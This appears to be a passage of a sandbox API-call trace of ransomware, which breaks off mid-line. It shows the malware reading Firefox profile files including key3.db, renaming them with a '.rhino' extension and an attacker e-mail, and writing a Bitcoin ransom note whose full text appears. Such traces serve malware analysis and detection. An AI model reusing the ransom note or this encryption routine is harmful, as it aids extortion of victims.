RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0094.970] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0094.970] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x2520078 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x2520308 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520078 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x2520450 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520308 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x2520638 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520450 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x2520908 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520638 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x2520d40 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520908 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x2520308 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520d40 | out: hHeap=0x6d0000) returned 1 [0094.971] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x2520c70 [0094.971] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520308 | out: hHeap=0x6d0000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x2521a88 [0094.972] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520c70 | out: hHeap=0x6d0000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x75ef78 [0094.972] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2521a88 | out: hHeap=0x6d0000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x760f40 [0094.972] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.972] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x763ed8 [0094.973] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f40 | out: hHeap=0x6d0000) returned 1 [0094.973] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0094.974] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x6d0000) returned 1 [0094.974] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0094.974] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0094.974] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0094.975] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0094.975] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0094.975] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0095.191] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0095.192] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x23b0048 [0095.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0095.205] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x23e2a90 [0095.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0095.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x2520308 [0095.226] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23e2a90 | out: hHeap=0x6d0000) returned 1 [0095.237] WriteFile (in: hFile=0xec, lpBuffer=0x2520320*, nNumberOfBytesToWrite=0x70120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2520320*, lpNumberOfBytesWritten=0x2cfa04*=0x70120, lpOverlapped=0x0) returned 1 [0095.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520308 | out: hHeap=0x6d0000) returned 1 [0095.440] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x70120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.440] CloseHandle (hObject=0xec) returned 1 [0095.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0095.447] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0048 [0095.447] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0095.447] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0095.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0095.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2520180 | out: hHeap=0x6d0000) returned 1 [0095.448] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0095.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0095.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0095.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0095.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x24b0048 [0095.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0095.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0095.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0095.465] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x0 [0095.466] CloseHandle (hObject=0xec) returned 1 [0095.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0095.467] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa0000 [0095.467] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa0120, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.467] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.467] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0095.764] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.777] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa0000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa0000, lpOverlapped=0x0) returned 1 [0095.844] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0095.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0095.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0095.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0095.845] GetLastError () returned 0x0 [0095.845] SetLastError (dwErrCode=0x0) [0095.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0095.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0023) returned 0x120020 [0096.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0150 [0096.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.047] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0096.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0096.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0096.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x24b0048 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x24b02d8 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x24b0420 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x24b0608 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0420 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x24b08d8 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0608 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x23b0048 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b08d8 | out: hHeap=0x6d0000) returned 1 [0096.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x24b02d8 [0096.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x23b0048 [0096.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x75ef78 [0096.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7604b8 [0096.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x762480 [0096.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7604b8 | out: hHeap=0x6d0000) returned 1 [0096.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x765418 [0096.050] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762480 | out: hHeap=0x6d0000) returned 1 [0096.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x73c0b8 [0096.562] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765418 | out: hHeap=0x6d0000) returned 1 [0096.563] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x75ef78 [0096.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0096.563] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x73c0b8 [0096.564] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0096.564] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0096.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x781f78 [0096.571] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0096.572] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x23b0048 [0096.577] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0096.578] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x23e2a90 [0096.585] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0096.588] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x242e9e0 [0096.682] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23e2a90 | out: hHeap=0x6d0000) returned 1 [0096.686] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaae2c) returned 0x26b0020 [0096.820] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa0120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0096.820] CloseHandle (hObject=0xec) returned 1 [0096.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x24b02d8 [0096.821] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c6) returned 0x24b0410 [0096.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b02d8 | out: hHeap=0x6d0000) returned 1 [0096.821] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0096.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0410 | out: hHeap=0x6d0000) returned 1 [0096.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x120020 | out: hHeap=0x6d0000) returned 1 [0096.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0048 [0096.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0096.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0150 [0096.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x24b0258 [0096.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0096.831] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0096.831] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0096.833] CloseHandle (hObject=0xec) returned 1 [0096.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0258 | out: hHeap=0x6d0000) returned 1 [0096.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0096.834] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x4000 [0096.834] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4120, nNumberOfBytesToLockHigh=0x0) returned 1 [0096.834] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.834] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0096.837] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.837] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x4000, lpOverlapped=0x0) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0096.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0096.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0096.839] GetLastError () returned 0x0 [0096.840] SetLastError (dwErrCode=0x0) [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4023) returned 0x75ef78 [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x24b0150 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x24b0258 [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0150 | out: hHeap=0x6d0000) returned 1 [0096.840] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0096.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0096.840] RtlAllocateHeap (HeapHandle=0x6d0000, 